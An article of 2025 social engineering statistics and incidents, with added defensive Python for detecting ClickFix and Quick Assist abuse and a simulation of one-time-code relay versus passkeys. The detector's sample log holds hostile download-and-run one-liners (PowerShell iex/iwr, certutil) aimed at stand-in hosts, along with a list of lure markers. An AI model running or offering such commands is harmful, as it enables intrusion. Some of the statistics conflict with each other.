Social Engineering Statistics And Facts (2025), By Modes, Types, Challenges and Notable Incidents

Updated · Oct 15, 2025


Introduction
Social Engineering Statistics: Sometimes the insider is the risk. That is why many organisations consider social engineering the most significant security threat: it exploits trust, which no amount of code testing can protect against. Rather than breaking into systems, social engineering manipulates emotions and behaviour to gain entry. From scams as old as commerce to modern digital trickery, criminals never miss a chance to exploit psychological weaknesses.
Cybercriminals will do almost anything to get at their victims' valuables. Knowing the statistics on these human-layer attacks helps organisations reinforce their defences and build lasting resilience against a threat that is not going away.
Editor’s Choice
- Phishing remains the most common social engineering technique, accounting for 65% of cases; PDFs are the most abused attachment type at 45.2%.
- Fake CAPTCHA campaigns grew 1,450% in the first quarter of 2025, driving a surge in social engineering incidents.
- Social engineering was behind 39% of initial access incidents in early 2025, underlining its central role in breaches.
- 81% of breaches were caused by external actors, with social engineering involved in 20% of those incidents.
- Email phishing accounts for 39% of cloud intrusions, stolen credentials for 35%, and SIM swapping and vishing for 6% each.
- Ransomware made up 28% of malware cases and 11% of all security incidents, with dark-web chatter about ransomware rising 25% year over year.
- Roughly half of people worldwide encounter a scam every week, and Microsoft blocks about 27,860 password attacks every second.
- Healthcare & Pharmaceuticals recorded the highest susceptibility rate (41.9%), followed by Insurance (39.2%) and Retail/Wholesale (36.5%).
- Global cybercrime costs are expected to reach an estimated US$10.5 trillion annually in 2025; scammers stole about US$1 trillion in 2024.
- U.S. consumers reported US$12.5 billion in fraud losses in 2024, of which government impostor scams accounted for US$789 million.
- BEC losses exceeded US$6.3 billion in 2024, with a median loss of about US$50,000 per incident.
- In 2024 the average ransomware payment was US$115,000, yet 64% of organisations refused to pay, up from 50% two years earlier.
Modes of Cyber Attacks
(Reference: sprinto.com)
- Social engineering is the most common path by which an attacker gains access to a system, with phishing alone accounting for 65% of such cases.
- About 36% of incident response caseloads begin with some form of social engineering.
- In early 2025, social engineering was behind 39% of initial access incidents, a spike driven by a 1,450% increase in fake CAPTCHA attacks, including ClickFix campaigns.
- External attackers remain the main concern, behind 81% of breaches; 20% of those also involve social engineering, showing that manipulating people is still a favoured way in.
- Phishing has declined slightly but remains a serious threat, accounting for 25% of social engineering incidents in 2024, down from 29% in 2023 and 46% in 2022.
- Malicious attachments carry most of these phishing campaigns: PDFs are the most abused format at 45.2%, followed by HTML at 17.4% and ZIP archives at 10.4%.
- Of the malicious PDFs, 42% obfuscated the harmful link, 28% hid it inside a stream, and 7% used password protection so that scanners could not open the file.
- Stolen credentials were the second-most-used entry point in 2024, at 16% of intrusions, overtaking traditional email phishing at 14%.
- For cloud instances, email phishing remained the most common initial access vector at 39%, with stolen credentials close behind at 35% and SIM swapping and vishing at 6% each.
- Adversaries used adversary-in-the-middle (AiTM) phishing kits and other MFA bypass techniques that undermined two-factor authentication. Such kits proxy the real login page, capturing the one-time code and the resulting session cookie; only phishing-resistant methods such as FIDO2/passkeys, which bind the credential to the site's origin, defeat them.
- Notably, 66% of phishing attempts in social engineering targeted privileged accounts, and 45% impersonated internal users to trick their victims.
- Ransomware accounted for 28% of malware-related cases and 11% of all security incidents, and dark-web chatter about ransomware rose 25% year over year in 2024.
- The most common impacts of social engineering were credential theft (29%), data theft (18%) and extortion (13%). Manufacturing was hit hardest, accounting for 26% of all incidents in 2024.
- Attackers are getting faster and more aggressive: lateral movement often begins within 60 minutes of initial access, and sometimes in under 15 minutes.
- Over 90% of social engineering attacks begin under the guise of a seemingly legitimate collaboration or engagement, which is what makes them so deceptive.
- These attacks caused 60% of data leakage incidents, an incidence 16% higher than that of other attack vectors.
- About half of these incidents involved business email compromise, and slightly more than 60% led to the disclosure of sensitive information, the leading form of social engineering damage.
Types of Social Engineering Attacks
(Reference: cxquest.com)
- According to Cxquest, phishing dominates the breakdown of social engineering attacks, accounting for 65% of all cases.
- A smaller but still sizeable share, 22%, is attributed to other, less common methods.
- SEO poisoning and malvertising account for 12%; here attackers manipulate search results or deploy fake ads to lure victims into clicking malicious links.
- Smishing (SMS phishing) and MFA bombing are the rarest, making up just 1% of incidents combined.
- Email phishing therefore keeps its place as attackers' favourite, even as newer mechanisms emerge.
Increasing Number of Social Engineering Attacks
- Social engineering is now an everyday issue for individuals and organisations alike, and the numbers show how widespread these attacks have become.
- Worldwide, 50% of people encounter a scam every week, and advance-fee fraud rose by almost 50% in 2025.
- Microsoft illustrates the scale of the problem: it blocks roughly 27,860 password attacks in the time it takes to read a single sentence.
- At the organisational level, 20% of companies deal with at least one account takeover incident every month, so the risk is constant and growing.
- Social engineering is not just common; it is front and centre in modern cybercrime.
- It plays a part in 25% of all advanced cyberattack campaigns.
- Some industries are more vulnerable than others: Healthcare & Pharmaceuticals lead at 41.9%, followed by Insurance at 39.2% and Retail & Wholesale at 36.5%.
- Between 2023 and 2024, some 389 healthcare institutions were hit by ransomware, delaying operations and forcing appointments to be rescheduled.
- Phishing susceptibility is high: the industry-wide Phish-prone Percentage (PPP) stands at 33.1%, meaning roughly one-third of employees across industries would fall for a phishing or related attack.
- Leaked secrets add to the danger: over 1.5 million credentials were exposed in code or public sources between January and June 2024, and 18% of repositories contained such secrets.
- In the second half of 2024 Microsoft mitigated 1.25 million distributed denial-of-service (DDoS) attacks, nearly four times the previous year's figure.
- Smaller businesses are the weak link: 55.8% of ransomware attacks target companies with 1 to 50 employees, showing how attackers focus on targets with few defences.
- Espionage now accounts for 52% of social engineering-related breaches, and 55% are financially motivated.
- Exploitation of internet-facing applications and theft or misuse of login credentials each account for 30% of intrusions, the top two ways attackers get into an environment.
Social Engineering – Cost And Consequences
- Beyond simple system breaches, social engineering attacks exploit human factors such as trust, curiosity and habitual communication channels to cause financial and operational havoc.
- The figures show how costly the threat has become. In 2024 the average cost of a data breach was US$4.88 million; in 2025 the figure slipped slightly to US$4.4 million.
- Despite that decrease, cybercrime as a whole is still rising sharply, with yearly damages estimated to reach US$10.5 trillion.
- Scammers drained over US$1 trillion worldwide in 2024; U.S. consumers lost US$12.5 billion to fraud, of which US$789 million went to government impostor scams.
- Investment scams are among the most expensive, causing more than US$4.5 billion in losses across 2023 and 2024.
- Tech support scams are also rampant, with 90% of malicious traffic on Microsoft Edge linked to them.
- Call-centre scams target the elderly and crypto traders in particular, with reported losses of US$1.9 billion, and recovery is rare.
- Worldwide, only about 4% of scam victims get their money back; the U.S. and the U.K., which have more responsive fraud-reporting systems, fare better.
- Login credentials were stolen in 29% of incidents in 2024, and ransom payments averaged US$115,000 per incident.
- On the bright side, more organisations are refusing to pay: 64% in 2024 compared with only 50% two years earlier.
- Small businesses are hit harder, however: 1 in 5 pays the ransom, usually within minutes, typically between US$10,000 and US$100,000.
- Business Email Compromise (BEC) remains the most damaging attack method, with US$6.3 billion in global losses in 2024 and a median loss of US$50,000 across nearly 19,000 reported cases.
- Manufacturing has become fertile ground, with extortion affecting 29% of victims and data theft 24%, both aimed at funds and intellectual property.
- Making matters worse, corporate credentials are frequently found in stolen data dumps: corporate domains appeared in 54% of ransomware-related credential thefts, and almost half of the affected devices were unmanaged, reflecting the mixing of personal and business logins.
Notable Incidents In Social Engineering Statistics
- Between 2024 and 2025, social engineering attacks became more intricate and more serious, shifting from simple phishing toward targeted infiltration.
- Attackers began embedding themselves in trusted tools and workflows, making their presence hard to trace.
- A report by NCC Group, the UK-headquartered cyber consulting firm, shows how quickly attackers can compromise a system.
- The attackers gained remote access within minutes by impersonating IT support and persuading the victim to start a Windows Quick Assist session.
- They then dropped malware hidden in image files, stole credentials through fake login screens, and used legitimate software to evade detection.
- The crypto sector was also hit: an engineer at CoinDCX allegedly facilitated the theft of US$44 million through social engineering, an insider incident that shows how weak vetting can lead to heavy losses.
- Attackers also frequently posed as IT support in Microsoft Teams chats, persuading users to grant them remote access that was later used to deploy ransomware.
- Two well-developed operations, Octo Tempest and UNC5537, stepped up their activity.
- Octo Tempest has evolved from SIM swapping to full-scale ransomware, and UNC5537 has been using stolen Snowflake customer credentials to exfiltrate sensitive data for extortion.
- UNC3944 used phone-based help-desk impersonation to defeat multifactor authentication and escalate to hands-on extortion, sometimes deploying ransomware such as RansomHub.
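The Quick Assist, Teams and fake-CAPTCHA (ClickFix/FileFix) incidents described in this section and in the "Modes of Cyber Attacks" section share two observable traits: a lure that makes the user run a command themselves (the Windows Run dialog and the File Explorer address bar both spawn that command as a child of explorer.exe), and a remote-assistance session followed by a download tool or script interpreter. The following is an added example, not taken from NCC Group's or any other cited report, of detection logic over process-creation events. The JSON event lines, hostnames, timestamps and `.example` domains are constructed; the field names follow Sysmon event ID 1 but the log is not real Sysmon output, and the 30-minute window and the Quick Assist install path are assumptions to tune for your environment.

```python
import json
from datetime import datetime, timedelta

# Interpreters and download tools that a lure or a "support technician" makes the user run.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
          "cscript.exe", "curl.exe", "certutil.exe", "bitsadmin.exe"}
# Command-line fragments typical of pasted ClickFix/FileFix one-liners.
LURE_MARKERS = ("http://", "https://", "-enc", "-e ", "iex", "invoke-expression",
                "downloadstring", "frombase64string", "mshta")
QUICKASSIST_WINDOW = timedelta(minutes=30)   # assumption: tune to your environment


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_events(lines) -> list:
    """One JSON object per line with Sysmon-style field names; returns events sorted by time."""
    events = []
    for line in lines:
        if not line.strip():
            continue
        event = json.loads(line)
        event["ts"] = datetime.strptime(event["UtcTime"], "%Y-%m-%d %H:%M:%S")
        events.append(event)
    return sorted(events, key=lambda e: e["ts"])


def is_clickfix(event: dict) -> bool:
    """Run dialog / Explorer address bar lure: explorer.exe spawns an interpreter that fetches or decodes code."""
    if basename(event["ParentImage"]) != "explorer.exe" or basename(event["Image"]) not in SHELLS:
        return False
    cmdline = event.get("CommandLine", "").lower()
    return any(marker in cmdline for marker in LURE_MARKERS)


def detect(lines) -> list:
    """Return (time, host, rule, command line) tuples for every event matching one of the two rules."""
    alerts = []
    last_quickassist = {}   # host -> time of the most recent Quick Assist launch
    for event in parse_events(lines):
        host, image = event["Computer"], basename(event["Image"])
        if image == "quickassist.exe":
            last_quickassist[host] = event["ts"]
            continue
        if is_clickfix(event):
            alerts.append((event["UtcTime"], host, "clickfix_or_filefix", event["CommandLine"]))
        elif (image in SHELLS and host in last_quickassist
              and event["ts"] - last_quickassist[host] <= QUICKASSIST_WINDOW):
            alerts.append((event["UtcTime"], host, "shell_after_quickassist", event["CommandLine"]))
    return alerts


# Constructed events (not real Sysmon output); paths and domains are illustrative only.
SAMPLE_LOG = r"""
{"UtcTime": "2025-06-02 09:14:03", "Computer": "WS-117", "Image": "C:\\Windows\\explorer.exe", "ParentImage": "C:\\Windows\\System32\\userinit.exe", "CommandLine": "C:\\Windows\\Explorer.EXE"}
{"UtcTime": "2025-06-02 09:31:40", "Computer": "WS-117", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell -w hidden -c \"iex (iwr http://captcha-check.example/verify.txt)\""}
{"UtcTime": "2025-06-02 09:40:12", "Computer": "WS-117", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe"}
{"UtcTime": "2025-06-02 10:02:11", "Computer": "WS-204", "Image": "C:\\Program Files\\WindowsApps\\MicrosoftCorporationII.QuickAssist_2.0.0.0_x64__8wekyb3d8bbwe\\QuickAssist.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "QuickAssist.exe"}
{"UtcTime": "2025-06-02 10:09:55", "Computer": "WS-204", "Image": "C:\\Windows\\System32\\certutil.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "certutil -urlcache -split -f http://support-portal.example/agent.exe C:\\Users\\Public\\agent.exe"}
{"UtcTime": "2025-06-02 11:15:30", "Computer": "WS-301", "Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "cmd.exe /c dir"}
"""

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(*alert, sep=" | ")
```

Run against the sample, the first rule fires on the pasted `iex (iwr ...)` one-liner and stays quiet on a user simply opening PowerShell, and the second fires on the `certutil -urlcache` download that follows the Quick Assist launch on the same host. The second rule is a correlation, not a signature: Quick Assist itself is legitimate, so the alert only has value when paired with the follow-on activity the incidents above describe.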
Conclusion
Social Engineering Statistics: Social engineering has become one of the most pertinent cybersecurity threats of 2025. From phishing, which dominates at about 65% of known incidents, to advanced techniques like FileFix or adversary-in-the-middle kits, attackers exploit human behaviour more than technical vulnerabilities. The financial and operational damage is staggering, with annual cybercrime costs estimated at US$10.5 trillion.
The primary sectors targeted include healthcare, finance and manufacturing, and small businesses are disproportionately affected. As offensive techniques advance, defenders should focus on awareness, hardened (phishing-resistant) authentication and fast incident response. Countering social engineering needs a blend of technology, awareness and a culture that resists manipulation.
FAQ
Phishing is the most prevalent technique because it targets trust and everyday communication channels. About 65% of social engineering cases in 2025 involved phishing, typically using PDF, HTML or ZIP attachments to carry links to malicious sites. Its simplicity, scalability and high success rate make it the method most attackers prefer.
The highest incidence rates are in Healthcare and Pharmaceuticals (41.9%), followed by Insurance (39.2%) and Retail/Wholesale (36.5%). These sectors hold sensitive personal and financial data, which makes them prized targets, and attackers also exploit their heavy reliance on digital communication and often weaker defences.
The list is long. Cybercrime damages are estimated to reach US$10.5 trillion in 2025, and scammers are estimated to have taken more than US$1 trillion in 2024 alone. U.S. consumers lost around US$12.5 billion to fraud, and Business Email Compromise alone caused US$6.3 billion in losses. Ransomware victims paid on average US$115,000 per attack.
Newer techniques include fake help-desk operations that abuse Windows Quick Assist, ClickFix and FileFix lures that persuade the user to run malicious commands themselves, and adversary-in-the-middle kits that bypass multifactor authentication. Attackers also impersonate IT or security staff on collaboration platforms.
Defences against social engineering must be layered. Continuous staff training lowers the chance of someone being phished, while strong authentication prevents a stolen password from being enough to get in. Because adversary-in-the-middle kits relay one-time codes, the authentication layer should be phishing-resistant MFA such as FIDO2/passkeys rather than codes typed into a web page.
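The FAQ's point that multifactor authentication blocks unauthorised entry needs the caveat raised in the statistics section: an adversary-in-the-middle kit proxies the real login page, so a one-time code the victim types into the lookalike site is simply forwarded within its validity window. The following added example, not code from this page, simulates that relay against both factor types. TOTP is implemented per RFC 6238; the passkey side is a simplification in which the authenticator's signature is replaced by an HMAC over the challenge and the origin the browser is actually on (real WebAuthn uses a public-key signature over clientDataJSON, but the origin binding that defeats the relay works the same way). Origins, secrets and the challenge are constructed.

```python
import hashlib
import hmac
import json
import struct

# Constructed origins: the genuine identity provider and the AiTM kit's lookalike.
REAL_ORIGIN = "https://login.example"
PROXY_ORIGIN = "https://login.example.attacker.example"


def totp(secret: bytes, unix_time: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP: HMAC-SHA1 over the time-step counter, then dynamic truncation."""
    counter = struct.pack(">Q", unix_time // step)
    digest = hmac.new(secret, counter, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F
    code = (struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF) % (10 ** digits)
    return str(code).zfill(digits)


def _client_data(challenge: str, origin: str) -> bytes:
    """What the browser hands the authenticator: the server's challenge plus the origin it is on."""
    return json.dumps({"challenge": challenge, "origin": origin}, sort_keys=True).encode()


class Authenticator:
    """User's authenticator. It signs the origin the browser really is on, not what the page claims to be."""

    def __init__(self, credential_key: bytes):
        self.credential_key = credential_key   # stand-in for the per-site private key

    def sign(self, challenge: str, browser_origin: str) -> str:
        return hmac.new(self.credential_key, _client_data(challenge, browser_origin), hashlib.sha256).hexdigest()


class IdentityProvider:
    def __init__(self, totp_secret: bytes, credential_key: bytes):
        self.totp_secret = totp_secret
        self.credential_key = credential_key   # stand-in for the registered public key

    def verify_totp(self, code: str, now: int) -> bool:
        return hmac.compare_digest(code, totp(self.totp_secret, now))

    def verify_assertion(self, challenge: str, assertion: str) -> bool:
        # The IdP only ever accepts client data that names its own origin.
        expected = hmac.new(self.credential_key, _client_data(challenge, REAL_ORIGIN), hashlib.sha256).hexdigest()
        return hmac.compare_digest(expected, assertion)


def aitm_relay_totp(idp: IdentityProvider, user_secret: bytes, now: int) -> bool:
    """Victim types password and TOTP into the proxy; the proxy forwards them to the real IdP in time."""
    code_typed_into_proxy = totp(user_secret, now)
    return idp.verify_totp(code_typed_into_proxy, now)    # accepted: the code carries no notion of origin


def aitm_relay_passkey(idp: IdentityProvider, authenticator: Authenticator, challenge: str) -> bool:
    """Proxy relays the IdP's challenge to the victim, whose browser is on PROXY_ORIGIN, then forwards the assertion."""
    assertion = authenticator.sign(challenge, PROXY_ORIGIN)
    return idp.verify_assertion(challenge, assertion)     # rejected: signed origin != REAL_ORIGIN


def legitimate_passkey(idp: IdentityProvider, authenticator: Authenticator, challenge: str) -> bool:
    return idp.verify_assertion(challenge, authenticator.sign(challenge, REAL_ORIGIN))


if __name__ == "__main__":
    secret, key = b"constructed-totp-seed", b"constructed-credential-key"
    idp, auth = IdentityProvider(secret, key), Authenticator(key)
    print("TOTP relayed through AiTM proxy accepted:", aitm_relay_totp(idp, secret, 1_700_000_000))
    print("passkey relayed through AiTM proxy accepted:", aitm_relay_passkey(idp, auth, "c0ffee"))
    print("passkey used on the real origin accepted:", legitimate_passkey(idp, auth, "c0ffee"))
```

The relay succeeds against TOTP because nothing in the six digits says where the user typed them, and the same holds for SMS codes and push approvals. It fails against the origin-bound credential because the signed client data names the proxy's hostname, which the identity provider never accepts. That is the property to look for when the page's "strong authentication" recommendation is turned into a procurement decision.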

I hold an MBA in Finance and Marketing, bringing a unique blend of business acumen and creative communication skills. With experience as a content writer crafting statistical and research-backed content across multiple domains, including education, technology, product reviews, and company website analytics, I specialize in producing engaging, informative, and SEO-optimized content tailored to diverse audiences. My work bridges technical accuracy with compelling storytelling, helping brands educate, inform, and connect with their target markets.